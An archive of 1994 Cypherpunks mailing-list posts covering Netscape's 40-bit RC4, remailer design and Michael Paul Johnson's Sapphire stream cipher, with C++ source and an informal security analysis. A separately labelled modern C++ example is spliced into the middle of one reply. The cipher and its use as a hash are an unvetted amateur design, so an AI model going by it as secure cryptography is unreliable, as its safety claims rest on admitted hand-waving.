Child support, vagrancy, alimony, using cash instead of plastic, parking tickets, income taxes, state taxes, municipal taxes, tax taxes, environmental terrorism (remember that tree in your yard you cut down?), jaywalking, having a hole in your sneakers, picking your nose, Un-American activities (ie, disagreeing with the Kongress), Tax Fraud (ie, trying not to give any more of your money than you have to to the Tax Gestapo), reading books on the Prohibited Publications List, Violation of National Health Policy (ie, eating junk food, or otherwise placing an 'undue burden' on the National Health Kare System), and any other kind of mopery and dopery they can think up. If you can think of it or do it, they'll make it illegal, immoral, or Socially Irresponsible.

>
>What happens when this database gets linked up to the "citizen
>tracking and employment eligibility" database under construction?

grab your ankles.

>Do we then have a de facto (cardless) national ID? I think so.

You got it, Bunky.

-----BEGIN PGP SIGNATURE-----
Version: 3.141592654

ThIsIsAfAkEsIgNaTuReBlOcKsOtHaTtHeSiLlYcYpHeRpUnKsReMaIlErAtToAd
DoEsNoTtHrOwUp,IfYoUCaNrEaDtHiS,ThEnYoUnEeDtOgOoUtAnDbUyYoUrSeLf
SoMeViSiNeToMaKeYoUrEyEsFeElBeTtEr-PlEaSeAcCePtMyApOlOgIeSfOrThE
rIdIcUlOuSnAtUrEoFtHiSuSeLeSsBiToFcRyPtO-
FlUfF
-----END PGP SIGNATURE-----

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From perry at imsi.com Sat Dec 10 15:51:42 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Sat, 10 Dec 94 15:51:42 PST
Subject: BofA+Netscape
In-Reply-To: <199412101803.KAA06370@desiree.teleport.com>
Message-ID: <9412102351.AA09781@snark.imsi.com>

Alan Olsen says:
> If you check their WWW page, you will find information on the Secure Sockets
> Layer.
It explains the algorithm used (RC4) and key size (40 bits).

40 bit RC4 will not stop any attacker with even moderate resources; it's crap.

Also, it's not clear we need Yet Another Encryption On Top Of Sockets protocol.

.pm

From jim at acm.org Sat Dec 10 15:56:15 1994
From: jim at acm.org (Jim Gillogly)
Date: Sat, 10 Dec 94 15:56:15 PST
Subject: Big Brother database
In-Reply-To: <199412102245.AA12412@metronet.com>
Message-ID: <9412102355.AA03584@mycroft.rand.org>

> merriman at metronet.com (David K. Merriman) writes:
> -----BEGIN PGP SIGNATURE-----
> Version: 3.141592654
> ThIsIsAfAkEsIgNaTuReBlOcKsOtHaTtHeSiLlYcYpHeRpUnKsReMaIlErAtToAd
...
> -----END PGP SIGNATURE-----

Sorry, your signature block doesn't check. My Pentium says the version number should actually be 3.14321865. Hope this helps.

Jim Gillogly
20 Foreyule S.R. 1994, 23:55

From eagle at deepthought.armory.com Sat Dec 10 18:39:45 1994
From: eagle at deepthought.armory.com (Jeff Davis)
Date: Sat, 10 Dec 94 18:39:45 PST
Subject: Algorithm Example Question
Message-ID: <9412101839.aa24547@deepthought.armory.com>

-----BEGIN PGP SIGNED MESSAGE-----

What is the Knapsack algorithm and could someone please give me an example of it? Is this single time key encryption? Thanks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLupl0V/ScHuGXWgVAQHgPwQAi9n9ucLZCAAYdzFxNXzVeduPptzLLrmL
sHVW1FJZuY00IR3psFxBb7ZZfl5ZXqdMT+CfzKBG5uIk13kKFyW7/HqOIWjsg3zj
cAof9Nb2kFvojClAV79FSyc9B3Quch5KqA/gFngCatjMPid3+1JWVebUY2H7AWf8
cF2hl/nGthI=
=7n9l
-----END PGP SIGNATURE-----

--
According to John Perry Barlow: *Join EFF*
"Jeff Davis is a truly gifted trouble-maker." *email *
*** O U T L A W S On The E L E C T R O N I C F R O N T I E R ****
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!"
JPB

From mpj at netcom.com Sat Dec 10 20:31:32 1994
From: mpj at netcom.com (Michael Paul Johnson)
Date: Sat, 10 Dec 94 20:31:32 PST
Subject: The Sapphire Stream Cipher
Message-ID:

THE SAPPHIRE STREAM CIPHER

The Sapphire Stream Cipher is designed to have the following properties:

* Be useful for generation of cryptographic check values as well as protecting message privacy.
* Accept a variable length key.
* Strong enough to justify _at least_ a 64 bit key for balanced security.
* Small enough to be built into other applications with several keys active at once.
* Key setup fast enough to support frequent key change operations but slow enough to discourage brute force attack on the key.
* Fast enough to not significantly impact file read & write operations on most current platforms.
* Portable among common computers and efficient in C, C++, and Pascal.
* Byte oriented.
* Include both ciphertext and plain text feedback (for both optimal data hiding and value in creation of cryptographic check values).
* Acceptable performance as a pure pseudorandom number generator without providing a data stream for encryption or decryption.
* Design in a little extra strength where there is doubt about what attacks might be a threat.

HISTORY AND RELATED CIPHERS

The Sapphire Stream Cipher is very similar to a cipher I started work on in November 1993. It is also similar in some respects to the alleged RC-4 that was posted to sci.crypt recently. Both operate on the principle of a mutating permutation vector. Alleged RC-4 doesn't include any feedback of ciphertext or plain text, however. This makes it more vulnerable to a known plain text attack, and useless for creation of cryptographic check values. On the other hand, alleged RC-4 is faster.

The Sapphire Stream Cipher is used in the shareware product Quicrypt, which is available at ftp://ftp.csn.net/mpj/qcrypt10.zip and on the Colorado Catacombs BBS (303-772-1062).
There are two versions of Quicrypt: the exportable version (with a session key limited to 32 bits but with strong user keys allowed) and the commercial North American version (with a session key of 128 bits). A variant of the Sapphire Stream Cipher is also used in the shareware program Atbash, which has no weakened exportable version.

I don't recall ever reading anything about using a stream cipher like this for the generation of cryptographic check values, but it seems like it should be a fast technique compared to some existing hash functions.

OVERVIEW

The Sapphire Stream Cipher is based on a state machine. The state consists of 5 index values and a permutation vector. The permutation vector is simply an array containing a permutation of the numbers from 0 through 255. Five of the bytes in the permutation vector are moved to new locations (which may be the same as the old location) for every byte output. The output byte is a nonlinear function of all 5 of the index values and 7 of the bytes in the permutation vector, thus frustrating attempts to solve for the state variables based on past output.

On initialization, the index variables are set (somewhat arbitrarily) to 1, 3, 5, 7, and 11. The permutation vector (called the cards array in the source code below) is shuffled based on the user key. This shuffling is done in a way that is designed to minimize the bias in the destinations of the bytes in the array. The biggest advantage in this method is not in the elimination of the bias, per se, but in slowing down the process slightly to make brute force attack more expensive. Eliminating the bias (relative to that exhibited by RC-4) is nice, but this advantage is probably of minimal cryptographic value.

KEY SETUP

Key setup (illustrated by the function initialize(), below) consists of three parts: 1. Initialize the index variables. 2. Set the permutation vector to a known state (a simple counting sequence). 3.
Starting at the end of the vector, swap each element of the permutation vector with an element indexed somewhere from 0 to the current index (chosen by the function keyrand()).

The keyrand() function returns a value between 0 and some maximum number based on the user's key, the current state of the permutation vector, and an index running sum called rsum. Note that the length of the key is used in keyrand(), too, so that a key like "abcd" will not result in the same permutation as a key like "abcdabcd".

ENCRYPTION

Each encryption involves updating the index values, moving (up to) 5 bytes around in the permutation vector, selecting an output byte, and adding the output byte bitwise modulo-2 (exclusive-or) to the plain text byte to produce the cipher text byte. The index values are incremented by different rules. The index called rotor just increases by one (modulo 256) each time. Ratchet increases by the value in the permutation vector pointed to by rotor. Avalanche increases by the value in the permutation vector pointed to by another byte in the permutation vector pointed to by the last cipher text byte. The last plain text and the last cipher text bytes are also kept as index variables. See the function called encrypt(), below for details.

PSEUDORANDOM BYTE GENERATION

If you want to generate random numbers without encrypting any particular ciphertext, simply encrypt 0. There is still plenty of complexity left in the system to ensure unpredictability (if the key is not known) of the output stream when this simplification is made.

DECRYPTION

Decryption is the same as encryption, except for the obvious swapping of the assignments to last_plain and last_cipher and the return value. See the function decrypt(), below.

C++ SOURCE CODE FRAGMENT

The original implementation of this cipher was in Object Oriented Pascal, but C++ is available for more platforms.

/* sapphire.h -- Interface for the Sapphire stream cipher.

   Dedicated to the Public Domain the author and inventor
   (Michael Paul Johnson).  This code comes with no warranty.
   Use it at your own risk.
   Ported from the Pascal implementation of the Sapphire Stream
   Cipher 9 December 1994.

   unsigned char is assumed to be 8 bits.  If it is not, the
   results of assignments need to be reduced to 8 bits with
   & 0xFF or % 0x100, whichever is faster.
*/

#include <stddef.h>     // NULL

class sapphire
{
    // These variables comprise the state of the state machine.

    unsigned char cards[256];       // A permutation of 0-255.
    unsigned char rotor,            // Index that rotates smoothly
                  ratchet,          // Index that moves erratically
                  avalanche,        // Index heavily data dependent
                  last_plain,       // Last plain text byte
                  last_cipher;      // Last cipher text byte

    // This function is used by initialize(), which is called by the
    // constructor.

    unsigned char keyrand(int limit, unsigned char *user_key,
                          unsigned char keysize, unsigned char *rsum,
                          unsigned *keypos);

public:
    sapphire(unsigned char *key = NULL,     // Calls initialize if a real
             unsigned char keysize=0);      // key is provided.  If none
                                            // is provided, call initialize
                                            // before encrypt or decrypt.
    ~sapphire();                            // Destroy cipher state information.
    void initialize(unsigned char *key,     // User key is used to set
                    unsigned char keysize); // up state information.
    unsigned char encrypt(unsigned char b = 0); // Encrypt byte
                                                // or get a random byte.
    unsigned char decrypt(unsigned char b);     // Decrypt byte.
    void burn(void);                        // Destroy cipher state information.
};

/* sapphire.cpp -- the Sapphire stream cipher class.

   Dedicated to the Public Domain the author and inventor:
   (Michael Paul Johnson).  This code comes with no warranty.
   Use it at your own risk.
   Ported from the Pascal implementation of the Sapphire Stream
   Cipher 9 December 1994.
*/

#include <string.h>     // memset()
#include "sapphire.h"

unsigned char sapphire::keyrand(int limit,
                                unsigned char *user_key,
                                unsigned char keysize,
                                unsigned char *rsum,
                                unsigned *keypos)
{
    unsigned u,             // Value from 0 to limit to return.
        retry_limiter,      // No infinite loops allowed.
        mask;               // Select just enough bits.

    if (!limit) return 0;   // Only one possible value; also keeps
                            // u %= limit below from dividing by zero.
    retry_limiter = 0;
    mask = 1;               // Fill mask with enough bits to cover
    while (mask < limit)    // the desired range.
        mask = (mask << 1) + 1;
    do
    {
        *rsum = cards[*rsum] + user_key[(*keypos)++];
        if (*keypos >= keysize)
        {
            *keypos = 0;            // Recycle the user key.
            *rsum += keysize;       // key "aaaa" != key "aaaaaaaa"
        }
        u = mask & *rsum;
        if (++retry_limiter > 11)
            u %= limit;     // Prevent very rare long loops.
    }
    while (u > limit);
    return u;
}

void sapphire::initialize(unsigned char *key, unsigned char keysize)
{
    // Key size may be up to 256 bytes.
    // Pass phrases may be used directly, with longer length
    // compensating for the low entropy expected in such keys.
    // Alternatively, shorter keys hashed from a pass phrase or
    // generated randomly may be used. For random keys, lengths
    // of from 4 to 16 bytes are recommended, depending on how
    // secure you want this to be.

    int i;
    unsigned char toswap, swaptemp, rsum;
    unsigned keypos;

    // Initialize the indices and data dependencies.
    // Indices are set to different values instead of all 0
    // to reduce what is known about the state of the cards
    // when the first byte is emitted.

    rotor = 1;
    ratchet = 3;
    avalanche = 5;
    last_plain = 7;
    last_cipher = 11;

    // Start with cards all in order, one of each.

    for (i=0;i<256;i++)
        cards[i] = i;

    // Swap the card at each position with some other card.

    toswap = 0;
    keypos = 0;         // Start with first byte of user key.
    rsum = 0;
    for (i=255;i>=0;i--)
    {
        toswap = keyrand(i, key, keysize, &rsum, &keypos);
        swaptemp = cards[i];
        cards[i] = cards[toswap];
        cards[toswap] = swaptemp;
    }
    toswap = swaptemp = rsum = 0;
    keypos = 0;
}

sapphire::sapphire(unsigned char *key, unsigned char keysize)
{
    if (key && keysize)
        initialize(key, keysize);
}

void sapphire::burn(void)
{
    // Destroy the key and state information in RAM.
    memset(cards, 0, 256);
    rotor = ratchet = avalanche = last_plain = last_cipher = 0;
}

sapphire::~sapphire()
{
    burn();
}

unsigned char sapphire::encrypt(unsigned char b)
{
    // Picture a single enigma rotor with 256 positions, rewired
    // on the fly by card-shuffling.

    // This cipher is a variant of one invented and written
    // by Michael Paul Johnson in November, 1993.

    unsigned char swaptemp;

    // Shuffle the deck a little more.

    ratchet += cards[rotor++];
    swaptemp = cards[last_cipher];
    cards[last_cipher] = cards[ratchet];
    cards[ratchet] = cards[last_plain];
    cards[last_plain] = cards[rotor];
    cards[rotor] = swaptemp;
    avalanche += cards[swaptemp];

    // Output one byte from the state in such a way as to make it
    // very hard to figure out which one you are looking at.

    last_cipher = b^cards[cards[(cards[ratchet] + cards[rotor] +
                                 cards[last_plain] +
                                 cards[last_cipher] +
                                 cards[avalanche])&0xFF]];
    last_plain = b;
    return last_cipher;
}

unsigned char sapphire::decrypt(unsigned char b)
{
    unsigned char swaptemp;

    // Shuffle the deck a little more.

    ratchet += cards[rotor++];
    swaptemp = cards[last_cipher];
    cards[last_cipher] = cards[ratchet];
    cards[ratchet] = cards[last_plain];
    cards[last_plain] = cards[rotor];
    cards[rotor] = swaptemp;
    avalanche += cards[swaptemp];

    // Output one byte from the state in such a way as to make it
    // very hard to figure out which one you are looking at.

    last_plain = b^cards[cards[(cards[ratchet] + cards[rotor] +
                                cards[last_plain] +
                                cards[last_cipher] +
                                cards[avalanche])&0xFF]];
    last_cipher = b;
    return last_plain;
}

GENERATION OF CRYPTOGRAPHIC CHECK VALUES (HASH VALUES)

For a fast way to generate a cryptographic check value (also called a hash or message integrity check value) of a message of arbitrary length, simply generate a set of 20 bytes (160 bits) by encrypting zeroes. The output so generated is the cryptographic check value.
To generate a cryptographic check value when message integrity is desired but encryption is not (for example, as part of a digital signature process), either use a "standard" key (like four bytes of zero) or simply bypass the "card shuffling" part of the key setup (for even more speed). The plain text is still fed to the encrypt function, but the ciphertext is discarded until the check value is generated.

SECURITY ANALYSIS

There are several security issues to be considered. Some are easier to analyze than others. The following includes more "hand waving" than mathematical proofs, and looks more like it was written by an engineer than a mathematician. The reader is invited to improve upon or refute the following, as appropriate.

KEY LENGTH

There are really two kinds of user keys to consider: (1) random binary keys, and (2) pass phrases. Analysis of random binary keys is fairly straightforward. Pass phrases tend to have much less entropy per byte, but the analysis made for random binary keys applies to the entropy in the pass phrase. The length limit of the key (255 bytes) is adequate to allow a pass phrase with enough entropy to be considered strong.

To be real generous to a cryptanalyst, assume dedicated Sapphire Stream Cipher cracking hardware. The constant portion of the key scheduling can be done in one cycle. That leaves at least 256 cycles to do the swapping (probably more, because of the intricacies of keyrand(), but we'll ignore that, too, for now). Assume a machine clock of about 256 MegaHertz (fairly generous). That comes to about one key tried per microsecond. On average, you only have to try half of the keys. Also assume that trying the key to see if it works can be pipelined, so that it doesn't add time to the estimate.
Based on these assumptions (reasonable for major governments), and rounding to two significant digits, the following key length versus cracking time estimates result:

Key length, bits    Time to crack
----------------    -------------
       32           35 minutes (exportable in qcrypt)
       33           1.2 hours (not exportable in qcrypt)
       40           6.4 days
       56           1,100 years (kind of like DES's key)
       64           290,000 years (good enough for most things)
       80           19 billion years (kind of like Skipjack's key)
      128           5.4E24 years (good enough for the clinically paranoid)

Naturally, the above estimates can vary by several orders of magnitude based on what you assume for attacker's hardware, budget, and motivation.

In the range listed above, the probability of spare keys (two keys resulting in the same initial permutation vector) is small enough to ignore. The proof is left to the reader.

INTERNAL STATE SPACE

For a stream cipher, internal state space should be at least as big as the number of possible keys to be considered strong. The state associated with the permutation vector alone (256!) constitutes overkill.

PREDICTABILITY OF THE STATE

If you have a history of stream output from initialization (or equivalently, previous known plaintext and ciphertext), then rotor, last_plain, and last_cipher are known to an attacker. The other two index values, flipper and avalanche, cannot be solved for without knowing the contents of parts of the permutation vector that change with each byte encrypted. Solving for the contents of the permutation vector by keeping track of the possible positions of the index variables and possible contents of the permutation vector at each byte position is not possible, since more variables than known values are generated at each iteration. Indeed, fewer index variables and swaps could be used to achieve security, here, if it were not for the hash requirements.
CRYPTOGRAPHIC CHECK VALUE

The relatively large portion of the state altered with each byte encrypted (relative to alleged RC-4) contributes to a rapid avalanche of generated check values -- probably more than is needed. A single bit change in a message causes a radical change in the check value generated (about half of the bits change). This is one good feature of a cryptographic check value.

Another good property of a cryptographic check value is that it is too hard to compute a message that results in a certain check value. In this case, we assume the attacker knows the key and the contents of a message that has the desired check value, and wants to compute a bogus message having the same check value. There are two obvious ways to do this attack. One is to solve for a sequence that will restore the state of the permutation vector and indices back to what it was before the alteration. The other one is the so-called "birthday" attack that is to cryptographic hash functions what brute force is to key search.

To generate a sequence that restores the state of the cipher to what it was before the alteration probably requires at least 256 bytes, since the index "rotor" marches steadily on its cycle, one by one. The values to do this cannot easily be computed, due to the nonlinearity of the feedback, so there would probably have to be lots of trial and error involved. In practical applications, this would leave a gaping block of binary garbage in the middle of a document, and would be quite obvious, so this is not a practical attack, even if you could figure out how to do it (and I haven't). If anyone has a method to solve for such a block of data, though, I would be most interested in finding out what it is. Please email me at m.p.johnson at ieee.org if you find one.

The "birthday" attack just uses the birthday paradox to find a message that has the same check value.
With a 20 byte check value, you would have to find at least 80 bits to change in the text such that they wouldn't be noticed (a plausible situation), then try the combinations until one matches. 2 to the 80th power is a big number, so this isn't practical either. If this number isn't big enough, you are free to generate a longer check value with this algorithm. Someone who likes 16 byte keys might prefer 32 byte check values for similar strength.

OTHER HOLES

Are there any? Take your best shot and let me know if you see any. I offer no challenge text with this algorithm, but you are free to use it without royalties to me if it is any good.

LEGAL STUFF

The intention of this document is to share some research results on an informal basis. You may freely use the algorithm and code listed above as far as I'm concerned, as long as you don't sue me for anything, but there may be other restrictions that I am not aware of to your using it. The C++ code fragment above is just intended to illustrate the algorithm being discussed, and is not a complete application. I understand this document to be Constitutionally protected publication, and not a munition, but don't blame me if it explodes or has toxic side effects.

 ___________________________________________________________
| |
|\ /| | | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 |
| \/ |o| | PO Box 1151, Longmont CO 80502-1151 USA Jesus is alive! |
| | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org |
| |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 |
| |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... |
| ||| \ \_/ | PGPprint=F2 5E A1 C1 A6 CF EF 71 12 1F 91 92 6A ED AE A9 |
|___________________________________________________________|

From amanda at intercon.com Sat Dec 10 21:52:09 1994
From: amanda at intercon.com (Amanda Walker)
Date: Sat, 10 Dec 94 21:52:09 PST
Subject: BofA+Netscape
Message-ID: <199412110551.AAA19376@intercon.com>

> It's my personal feeling that Netscape doesn't have the right
> talent mix to develop secure software.

It's my personal feeling that Netscape doesn't have the right talent mix to develop *any* Internet software, secure or not. Although, I have to say, I've never seen a startup that pissed off so much of the Internet industry and user community in so short a time. Even Apple & Microsoft agree that Netscape is brain dead...

Amanda Walker
InterCon Systems Corporation

From jamesd at netcom.com Sat Dec 10 22:26:21 1994
From: jamesd at netcom.com (James A. Donald)
Date: Sat, 10 Dec 94 22:26:21 PST
Subject: Algorithm Example Question
In-Reply-To: <9412101839.aa24547@deepthought.armory.com>
Message-ID: <199412110605.WAA15114@netcom9.netcom.com>

Jeff Davis writes
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> What is the Knapsack algorithm and could someone please give me an example
> of it? Is this single time key encryption?
>
> Thanks.

Well the main thing you need to know about the knapsack problem is that crypto schemes based on the knapsack problem get broken with depressing regularity.

--
---------------------------------------------------------------------
We have the right to defend ourselves and
our property, because of the kind of animals that we    James A. Donald
are. True law derives from this right, not from the
arbitrary power of the omnipotent state.
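Added example, not part of any message in this thread and not Michael Paul Johnson's code: a compact C++ rendering of the Sapphire state machine from his post above, used to compute check values the way the post describes (feed the plaintext to encrypt(), discard the ciphertext, then encrypt 20 zero bytes) and to count how many bits change after a one-bit edit. The names Sapphire, step, check_value, bit_distance and STANDARD_KEY, the constructed messages, and the early return for limit == 0 in keyrand() are assumptions of this example.

```cpp
// Added example: Sapphire check values on constructed inputs (not the post's code).
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

class Sapphire {
    uint8_t cards[256];   // permutation of 0..255
    uint8_t rotor, ratchet, avalanche, last_plain, last_cipher;

    // Key-driven value in [0, limit], following keyrand() in the post.
    uint8_t keyrand(unsigned limit, const uint8_t *key, uint8_t keysize,
                    uint8_t *rsum, unsigned *keypos) {
        // Assumption of this example: the last swap is cards[0] with itself,
        // so return early and never reach "u %= 0".
        if (limit == 0) return 0;
        unsigned mask = 1, retries = 0, u;
        while (mask < limit) mask = (mask << 1) + 1;
        do {
            *rsum = (uint8_t)(cards[*rsum] + key[(*keypos)++]);
            if (*keypos >= keysize) {           // recycle the key and mix in its
                *keypos = 0;                    // length: "abcd" != "abcdabcd"
                *rsum = (uint8_t)(*rsum + keysize);
            }
            u = mask & *rsum;
            if (++retries > 11) u %= limit;     // bound the rejection loop
        } while (u > limit);
        return (uint8_t)u;
    }

    // State update used for every byte; returns the keystream byte.
    uint8_t step() {
        ratchet = (uint8_t)(ratchet + cards[rotor++]);
        uint8_t t = cards[last_cipher];
        cards[last_cipher] = cards[ratchet];
        cards[ratchet] = cards[last_plain];
        cards[last_plain] = cards[rotor];
        cards[rotor] = t;
        avalanche = (uint8_t)(avalanche + cards[t]);
        return cards[cards[(cards[ratchet] + cards[rotor] + cards[last_plain] +
                            cards[last_cipher] + cards[avalanche]) & 0xFF]];
    }

public:
    // keysize must be 1..255 bytes.
    Sapphire(const uint8_t *key, uint8_t keysize)
        : rotor(1), ratchet(3), avalanche(5), last_plain(7), last_cipher(11) {
        for (int i = 0; i < 256; i++) cards[i] = (uint8_t)i;
        uint8_t rsum = 0;
        unsigned keypos = 0;
        for (int i = 255; i >= 0; i--) {
            uint8_t j = keyrand((unsigned)i, key, keysize, &rsum, &keypos);
            uint8_t t = cards[i]; cards[i] = cards[j]; cards[j] = t;
        }
    }

    // Plaintext and ciphertext both feed back into the state.
    uint8_t encrypt(uint8_t b = 0) {
        last_cipher = (uint8_t)(b ^ step());
        last_plain = b;
        return last_cipher;
    }
};

// The post's "standard" key for unkeyed check values: four bytes of zero.
static const uint8_t STANDARD_KEY[4] = {0, 0, 0, 0};

// Feed the message through encrypt(), discard the ciphertext, then take
// `len` bytes produced by encrypting zeroes as the check value.
std::vector<uint8_t> check_value(const std::string &msg,
                                 const uint8_t *key = STANDARD_KEY,
                                 uint8_t keysize = 4, size_t len = 20) {
    Sapphire s(key, keysize);
    for (unsigned char c : msg) s.encrypt(c);
    std::vector<uint8_t> out(len);
    for (size_t i = 0; i < len; i++) out[i] = s.encrypt(0);
    return out;
}

// Number of differing bits between two check values of equal length.
int bit_distance(const std::vector<uint8_t> &a, const std::vector<uint8_t> &b) {
    int d = 0;
    for (size_t i = 0; i < a.size() && i < b.size(); i++)
        for (unsigned x = a[i] ^ b[i]; x; x &= x - 1) d++;
    return d;
}

int main() {
    // Constructed messages differing in one bit ('1' = 0x31, '9' = 0x39).
    std::vector<uint8_t> a = check_value("Pay Alice 100 dollars");
    std::vector<uint8_t> b = check_value("Pay Alice 900 dollars");
    for (uint8_t x : a) std::printf("%02x", x);
    std::printf("\nbits changed by a one-bit edit: %d of 160\n", bit_distance(a, b));
    return 0;
}
```

A check value computed under a fixed public key like this detects accidental or unkeyed changes only; anyone can recompute it, so binding it to a sender needs a secret key or a signature over it, as the post notes.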
jamesd at netcom.com

From shamrock at netcom.com Sat Dec 10 23:31:31 1994
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 10 Dec 94 23:31:31 PST
Subject: BofA+Netscape
Message-ID:

Amanda Walker wrote:

>> It's my personal feeling that Netscape doesn't have the right
>> talent mix to develop secure software.
>
>It's my personal feeling that Netscape doesn't have the right talent mix to
>develop *any* Internet software, secure or not. Although, I have to say,
>I've never seen a startup that pissed off so much of the Internet industry
>and user community in so short a time. Even Apple & Microsoft agree that
>Netscape is brain dead...

Would you mind elaborating?

-- Lucky Green
PGP encrypted mail preferred.

From lcottrell at popmail.ucsd.edu Sun Dec 11 00:05:05 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 11 Dec 94 00:05:05 PST
Subject: nym based remailer proposals
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Current nym based remailers suffer from the same insecurity that all return addresses share. It is easy for an opponent to trace a return address by sending many messages to that address, and watching the traffic generated. If the remailer uses a database of nyms to real names (like Julf's penet remailer) then all security rests with the integrity of the operator and the security of that one system.

These security problems can be avoided, while still providing the benefits of a "replyable" address. I suggested the following scheme at the last San Diego Cypherpunks meeting. It was well received there, so I hope it will be of interest.

Having read the help files, this is my understanding of how the current nym based remailers work. I send an anonymous reply block to the nym remailer, which puts it in a database, along with my chosen nym. This can all be done through remailers. Now anyone can send mail to nym at remailer.address.com and it will be sent to me using the reply block I sent.
I propose two changes:

1) To facilitate replying to nyms, I should be able to send mail to the remailer indicating the nym it should appear to be from. Then a recipient would simply hit reply, and the response would go back to the real sender.

2) I propose the use of message pools rather than return addresses. With enough subscribers, the best way to do this would be using mailing lists. There already exist many tools which could filter out all pool messages other than yours. Until that time, alt.anonymous.messages would be a better choice.

To be practical, both of these schemes require that the user be able to filter out messages to other nyms. The remailer (which might be better called a nym server) should place the subject line of the incoming reply in the body of the message, and replace the subject line with some searchable string (e.g. To Nym: Pr0duct Cypher). Searching alt.anonymous.messages for your nym in the subject line would reveal all messages to you.

While the current system would allow me to have messages sent to a message pool using a mail-to-news gateway, I am not now able to search for messages to me, and I can not send messages "From: " my nym.

-Lance (Ice Weasel) Cottrell

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche

From tcmay at netcom.com Sun Dec 11 01:19:36 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 01:19:36 PST
Subject: "Crypto Anarchy and Virtual Communities"
Message-ID: <199412110919.BAA10461@netcom6.netcom.com>

I discovered today at the Cypherpunks meeting what happened to the posts of my paper I made to the list.

I converted the FrameMaker version of a paper (to be presented in Monte Carlo in early February) to plain text, with attempts to clean up most of the non-standard ASCII stuff. This paper was 43K in length, and I posted it, figuring most of you could handle it (save it, dump it, etc.).

So I posted it on Wednesday. It didn't appear. So I tried again on Friday. Still nothing...and no bounce messages, no nothing.

Well, Eric told me today that all messages above some size (40K, he recalls) are routed to a mailbox for manual processing. He hasn't checked it recently, so....

I hate to put files in my ftp account, as Netcom's ftp site is grossly overcrowded and nearly all attempts to access it fail. (Netcommies are roadkill on the I-way.))

But it is there, at ftp.netcom.com, in pub/tc/tcmay. (Full address for direct access is: /ftp/pub/tc/tcmay.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From lmccarth at ducie.cs.umass.edu Sun Dec 11 02:08:18 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 02:08:18 PST
Subject: manual processing of big list messages
Message-ID: <199412111013.FAA19099@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> Well, Eric told me today that all messages above some size (40K, he
> recalls) are routed to a mailbox for manual processing. He hasn't
> checked it recently, so....

The next question is, does Eric manually delay long unsigned messages for longer than long signed messages ? ;}

- - -L. Futplex McCarthy "Why did I say that ? `Cause it's a motherfuckin' fact !" --Us3

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From geoffrey at crl.com Sun Dec 11 06:33:16 1994
From: geoffrey at crl.com (Geoffrey Faivre-Malloy)
Date: Sun, 11 Dec 94 06:33:16 PST
Subject: BofA+Netscape (fwd)
Message-ID:

>> It's my personal feeling that Netscape doesn't have the right
>> talent mix to develop secure software.
>
>
>It's my personal feeling that Netscape doesn't have the right talent mix to
>develop *any* Internet software, secure or not. Although, I have to say,
>I've never seen a startup that pissed off so much of the Internet industry

What have they done to piss people off?

>and user community in so short a time. Even Apple & Microsoft agree that
>Netscape is brain dead...
>
>
>Amanda Walker
>InterCon Systems Corporation

From rfb at lehman.com Sun Dec 11 07:53:00 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Sun, 11 Dec 94 07:53:00 PST
Subject: BofA+Netscape
In-Reply-To: <199412110551.AAA19376@intercon.com>
Message-ID: <9412111550.AA29913@cfdevx1.lehman.com>

    Date: Sun, 11 Dec 1994 00:51:46 -0500
    From: Amanda Walker

    It's my personal feeling that Netscape doesn't have the right talent mix to
    develop *any* Internet software, secure or not.

Well, I can't and won't attempt to speak to the overall mix of talent, however I think that such a strong statement really needs to be accompanied by some sort of an explanation.

For what it's worth, I have worked closely with one of the members of Netscape's team and have continued to stay in touch with him over the years since we worked together. I'm quite confident of his stylistic and technical abilities and I believe that he deserves better than the unsubstantiated slam that you've delivered.

    Even Apple & Microsoft agree that Netscape is brain dead...

I'm assuming that you see agreement with Apple and/or Microsoft as a positive. That position is not universally held.

Rick

From db at Tadpole.COM Sun Dec 11 08:48:32 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Sun, 11 Dec 94 08:48:32 PST
Subject: BofA+Netscape
In-Reply-To: <9412111550.AA29913@cfdevx1.lehman.com>
Message-ID: <9412111647.AA23311@tadpole.tadpole.com>

>
